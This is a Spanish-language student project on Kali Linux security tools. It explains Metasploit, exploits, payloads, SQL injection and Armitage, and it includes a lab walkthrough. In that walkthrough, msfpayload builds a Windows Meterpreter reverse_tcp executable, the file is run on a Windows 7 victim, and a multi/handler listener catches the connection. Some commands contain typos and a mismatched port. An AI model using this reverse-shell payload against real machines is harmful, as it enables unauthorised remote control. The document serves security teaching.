proyecto seguridad
DESCRIPTION
trabajoTRANSCRIPT
-
UNIVERSIDAD TCNICA DE MANAB
FACULTAD DE CIENCIAS INFORMTICAS
ESCUELA DE INGENIERA EN SISTEMAS INFORMTICOS
"Forma Ingenieros en Sistemas Informticos de excelencia para servir a la sociedad con eficiencia y transparencia contribuyendo al buen vivir"
Proyecto Integrador
Tema: Anlisis e implementacin de herramientas de seguridad en Kali Linux para observar vulnerabilidades existentes de sistemas operativos.
Seguridad Informtica.
SPTIMO SEMESTRE PARALELO "A"
ESTUDIANTES:
Bravo Bermello Lauro
Mendoza Arauz David
Paredes Bravo Jonathan
Peaherrera Tala Leonardo
PROFESOR GUA:
Ing. David Zambrano.
PERODO ACADMICO:
OCTUBRE DEL 2015 HASTA FEBRERO DEL 2016
PORTOVIEJO MANAB ECUADOR
-
Introduccin
Se entiende por seguridad informtica al conjunto de normas, procedimientos
y herramientas, que tienen como objetivo garantizar la disponibilidad, integridad,
confidencialidad y buen uso de la informacin que reside en un sistema de informacin.
Cada da ms y ms personas mal intencionadas intentan tener acceso a los datos de
nuestros ordenadores.
El acceso no autorizado a una red informtica o a los equipos que en ella se encuentran
puede ocasionar en la gran mayora de los casos graves problemas.
Uno de las posibles consecuencias de una intrusin es la prdida de datos. Es un hecho
frecuente y ocasiona muchos trastornos, sobre todo si no estamos al da de las copias de
seguridad. Y aunque estemos al da, no siempre es posible recuperar la totalidad de los
datos.
Otro de los problemas ms dainos es el robo de informacin sensible y confidencial. La
divulgacin de la informacin que posee una empresa sobre sus clientes puede acarrear
demandas millonarias contra esta, o un ejemplo mas cercano a usted es el de nuestras
contraseas de las cuentas de correo por las que intercambiamos informacin con otros.
Con la constante evolucin de las computadoras es fundamental saber que recursos
necesitar para obtener seguridad en los sistemas de informacin.
-
Objetivo general:
Analizar e implementar herramientas de seguridad en Kali Linux para observar vulnerabilidades existentes de sistemas operativos.
Objetivos especficos.
El presente proyecto tiene como objetivo comprender los conceptos bsicos de
seguridad informtica utilizando la herramiento Kali de Linux.
Describir los principales problemas de seguridad informtica con los que se
enfrentas los usuarios de computadoras.
Conocer los conceptos de Integridad, confiabilidad y disponibilidad de la
informacin.
-
MARCO TEORICO
Qu es Kali Linux?
Kali Linux es la nueva generacin del lder en la industria de pruebas de penetracin y
auditora de seguridad de Linux mejor conocido como BackTrack Linux. Kali es una
completa re-construccin de BackTrack desde la base hacia arriba, y se adhiere
completamente a los estndares de desarrollo de Debian.
Caractersticas de Kali Linux
Kali Linux es una distribucin de Linux avanzada para pruebas de penetracin y auditoras
de seguridad.
Kali es una completa re-construccin de BackTrack Linux desde la base hacia arriba, y se
adhiere completamente a los estndares de desarrollo de Debian. Toda la nueva
infraestructura ha sido puesta en el lugar, todas las herramientas fueron revisadas y
fueron embaladas, y hemos cambiado a Git para nuestro VCS.
Ms de 300 herramientas de pruebas de penetracin: Despus de revisar todas
las herramientas que se incluyen en BackTrack, hemos eliminado una gran
cantidad de herramientas que, o bien no funcionaban o tenan otras herramientas
disponibles que proporcionan una funcionalidad similar.
Gratis y siempre lo ser: Kali Linux, al igual que su predecesor, es completamente
gratis y siempre lo ser. Nunca, jams, tendrs que pagar por Kali Linux.
Git rbol de cdigo abierto: Somos partidarios enormes de software de cdigo
abierto y nuestro rbol de desarrollo est disponible para todos y todas las
fuentes estn disponibles para aquellos que desean modificar y reconstruir
paquetes.
Obediente a FHS: Kali ha sido desarrollado para cumplir con el Estndar de
jerarqua del sistema de ficheros, permitiendo que todos los usuarios de Linux
puedan localizar fcilmente archivos binarios, archivos de soporte, bibliotecas,
etc.
-
Amplio apoyo a dispositivos inalmbricos: Hemos construido Kali Linux para que
soporte tantos dispositivos inalmbricos como sea posible, permitiendo que
funcione correctamente en una amplia variedad de hardware y hacerlo
compatible con varios USB y otros dispositivos inalmbricos.
Kernel personalizado con parches de inyeccin: Como probadores de
penetracin, el equipo de desarrollo a menudo tiene que hacer evaluaciones
inalmbricas para que nuestro kernel tenga los ltimos parches de inyeccin
incluidos.
Entorno de desarrollo seguro: El equipo de Kali Linux est compuesto por un
pequeo grupo de personas de confianza que slo puede comprometer e
interactuar con los paquetes de los repositorios, haciendo uso de mltiples
protocolos seguros.
Paquetes firmado con PGP y repos: Todos los paquetes de Kali son firmados por
cada desarrollador individualmente cuando se construyen y son comprometidos.
Los repositorios posteriormente firman los paquetes tambin.
Multi-lenguaje: Aunque las herramientas de penetracin tienden a ser escritas en
Ingls, nos hemos asegurado de que Kali tenga soporte multilinge, lo que
permite a ms usuarios poder operar en su idioma nativo y encontrar las
herramientas necesarias para el trabajo.
Totalmente personalizable: Estamos completamente conciente de que no todo el
mundo estar de acuerdo con nuestras decisiones de diseo por lo que hemos
hecho lo ms fcil posible para nuestros usuarios ms aventureros puedan
personalizar Kali Linux a su gusto, todo el camino hasta el ncleo.
Soporte ARMEL y ARMHF: Dado a que los sistemas basados en ARM son cada vez
ms frecuentes y de bajo costo, sabamos que el soporte de ARM de Kali tendran
que ser tan robusta como podramos administrar, resultando en instalaciones que
trabajan en sistemas de ARMEL y ARMHF. Kali Linux tiene repositorios ARM
integrado con la lnea principal de distribucin de modo que las herramientas para
ARM sern actualizada en relacin con el resto de la distribucin. Kali est
disponible para los dispositivos ARM siguientes:
o rk3306 mk/ss808
o Raspberry Pi
-
o ODROID U2/X2
o MK802/MK802 II
o Samsung Chromebook
Kali est diseado especficamente para las pruebas de penetracin y, por tanto, toda la
documentacin de este sitio asume el conocimiento previo del sistema operativo Linux.
http://es.docs.kali.org/introduction-es/que-es-kali-linux
Qu es Metasploit?
El FrameWork de Metasploit es una herramienta de penetracin de cdigo libre,
desarrollado para ejecutar exploits a un objetivo remoto. Metasploit cuenta con la mayor
base de datos de exploits pblicos y probados y puede ser usado para detectar las
vulnerabilidades de nuestros sistemas para protegerlos o usar esas vulnerabilidades para
obtener acceso a sistemas remotos.
Es una herramienta bastante poderosa para los test de penetracin y es algo que todo
profesional de seguridad debe dominar. Puede ser un poco complicado al inicio pero todo
es cuestin de paciencia y dedicacin.
El framework de Metasploit ha sido una de las herramientas ms utilizadas por los
profesionales de seguridad informtica para llevar a cabo sus test de penetracin y
auditorias de seguridad pero era muy poco conocido. Esa situacin cambio
significativamente cuando el personal de Offensive Security desarrollo un curso en lnea
para ensear el uso de esta herramienta.
-
Los pasos bsicos a seguir para explotar las vulnerabilidades usando Metasploit son:
Elegir y configurar el Exploit ( Codigo que permite aprovechar la vulnerabilidad de
un sistema)
Opcionalmente confirmar si el objetivo es susceptible al exploit elegido
Elegir y configurar el Payload (Codigo que se ejecutara una vez explotemos la
vulnerabilidad)
Elegir la tcnica de codificacin para que un IPS ignore el Payload
Ejectutar el Exploit
Para poder elegir un exploit y un payload es necesario que contemos con alguna
informacin del sistema remoto, tal como el Sistema operativo y servicios de red
instalados. Esto lo podemos obtener con una herramienta de escaneo de puertos y
Fingerprinting como Nmap.
Una vez comprometemos y tenemos acceso al sistema remoto hacer bsicamente lo que
queramos. La idea aqu es que lo usemos para poner a prueba los controles de Seguridad
que tenemos en nuestra infraestructura y si logramos violar la los controles pues
podemos crear un plan de accin para mitigar las vulnerabilidades y evitar que sea un
malintencionado el que logre comprometer nuestros sistemas.
El framework de Metasploit viene en las distribuciones de seguridad BackTrack y Kali
Linux y puede ser descargado desde su pagina oficial.
Ms Adelante estaremos viendo varios tutoriales para que aprendamos a utilizar este
Framework.
Si deseas conocer ms o descargar Metasploit, visita su pgina oficia
Qu es un exploit
Las definiciones habituales hablan de un programa o cdigo que se aprovecha de un agujero de seguridad (vulnerabilidad) en una aplicacin o sistema, de forma que un atacante podra usarla en su beneficio.
-
Trasladado a la vida real, sera como si un modelo de cerradura (sistema o aplicacin) tuviera un fallo de diseo que nos permitiera crear llaves que la abrieran (exploit) y poder as acceder al sitio que trata de proteger y realizar actos delictivos (malware).
Existe confusin entre los usuarios y cierto mito de que un exploit puede considerarse malware. La realidad es que, tal y como hemos visto en el ejemplo, no es un cdigo malicioso en s mismo, sino que es la llave para que estos accedan a nuestro sistema.
De esta forma, puede proporcionarles los permisos necesarios para poder ejecutarse en un sistema e infectarlo aprovechndose de una vulnerabilidad.
Qu es PayLoad?
Hablamos que las vulnerabilidades o errores presentes en cualquier software pueden ser
aprovechadas para producir efectos inesperados en los equipos, una vez descubierto ese
fallo se desarrollaban pequeos programas (exploits) para forzar de forma especfica ese
error en el sistema, y ahora qu?
Adems de conseguir que el software produzca ese error lo ideal sera poder
aprovecharlo para que el equipo realice las funciones que yo desee.
Esa parte del software que nos brinda una funcin ante un error es el Payload, la ventaja
de este planteamiento es que el mismo payload puede ser utilizado por distintos exploits
y un mismo exploit puede utilizar varios payloads, una programacin modular fantstica.
Un ejemplo
Se publica una vulnerabilidad conocida en un servidor web muy utilizado, ...cuando una
peticin malformada chuchugua, chuchugua llama a la funcin de php no se qu que
provoca que se pueda X, y permite la ejecucin de cdigo en la maquina del server.
La comunidad (incluidos los malos) se ponen a trabajar y desarrollan el software (exploit)
normalmente con lenguajes de programacin rpidos ruby, perl o phyton para provocar
ese error, adems desarrollan o disean ese software para que el fallo permita sacar
ventaja, brindarnos una Shell, screenshot, etc. En muchas ocasiones se utilizan
Payloads ya creados para otros exploits, otras veces hay que disearlos especficamente
para ese exploit.
-
Inyeccin SQL
Inyeccin SQL es un mtodo de infiltracin de cdigo intruso que se vale de una
vulnerabilidad informtica presente en una aplicacin en el nivel de validacin de las
entradas para realizar operaciones sobre una base de datos.
El origen de la vulnerabilidad radica en el incorrecto chequeo o filtrado de las variables
utilizadas en un programa que contiene, o bien genera, cdigo SQL. Es, de hecho, un error
de una clase ms general de vulnerabilidades que puede ocurrir en cualquier lenguaje de
programacin o script que est embebido dentro de otro.
Se conoce como Inyeccin SQL, indistintamente, al tipo de vulnerabilidad, al mtodo de
infiltracin, al hecho de incrustar cdigo SQL intruso y a la porcin de cdigo incrustado
Qu es Armitage?
Armitage es una Herramienta e colaboracin en equipo que permite el uso de Scripts para Metasploit que permite visualizar objetivos, recomienda exploits y expone las caractersticas avanzadas de post-explotacin que tiene el framework.
A travs de una instancia de metasploit, su equipo (grupo de trabajo) podr realizar lo siguiente:
Usar las mismas sesiones. Compartir host, datos capturados y archivos descargados. Comunicarse a travs de un registro de eventos compartido. Ejecutar bots para automatizar las tareas del equipo (grupo de trabajo).
-
PRACTICA
Vulnerando Windows 7 con metaexploit
Usar el sistema libre kali Linux
Abrir la consola de kali
Usar la Shell de msfconsole
1) Escoger el exploit disponible para Windows
2) Use exploit/multi/handler
3) Direccionar la IP del host local
4) Set LHOST =192.168.67.130
5) Direccionar el puerto 4321 u otro que no este quemado
6) Set LPORT 4231
7) Usar un payload es decir el ataque que trae el exploit
8) Msfpayload Windows/meterpterter/reverse_tcp LHOST=192.168.67.130 LPORT=4321
x>/root/prueba.exe
-
Ahora ya tenemos creado un tipo de archivo infectado el cual lo generamos en la carpeta
personal de kali y se llama prueba.exe
Despus copiamos el archivo infectado a la maquina victima en este caso es un sistema
Windows 7
-
Vamos a kali nuevamente y ahora estar escuchando el exploit
Escribimos exploit en la consola de Kali
Abrimos en Windows 7 el archivo infectado
En kali ya estar comprometida la maquina y lista para ser atacada en todos sus arboles de
procesos
En la consola si queremos de modo grafico ver lo que la victima hace con el comando run vnc
-
Tambin podemos acceder a los directorios con meterpreter>ps
-
Podemos ver el trafico entre procesos con el wireshark
-
Prctica con inyeccin sql a una pgina web vulnerable
-
Practica con armitaje vulnerando el sistema operativo window 8
-
Conclusiones
Si bien da a da aparecen nuevos y complejos tipos de incidentes, an se registran
fallas de seguridad de fcil resolucin tcnica, las cuales ocurren en muchos casos
por falta de conocimientos sobre los riesgos que acarrean.
Las organizaciones no pueden permitirse considerar la seguridad como un
proceso o un producto aislado de los dems. La seguridad tiene que formar parte
de las organizaciones.
Debido a la constantes amenazas en que se encuentran los sistemas, es necesario
que los usuarios y las empresas enfoquen su atencin en el grado de
vulnerabilidad y en las herramientas de seguridad con las que cuentan para
hacerle frente a posibles ataques informticos que luego se pueden traducir en
grandes prdidas.
Recomendaciones
Actualice regularmente su sistema
Instale un Antivirus.
Instale un Firewall
Utilice contraseas seguras
Navegue por pginas web seguras y de confianza.
Ponga especial atencin en el tratamiento de su correo electrnico
No abra mensajes de correo de remitentes desconocidos.
Desconfe de aquellos e-mails en los que entidades bancarias, compaas de
subastas o sitios de venta online, le solicitan contraseas, informacin
confidencial, etc.
WEBGRAFIA:
http://www.seguridadjabali.com/2012/10/que-es-payload.html
http://www.jsitech.com/linux/que-es-metasploit/
http://www.seguridadjabali.com/2012/10/que-es-payload.html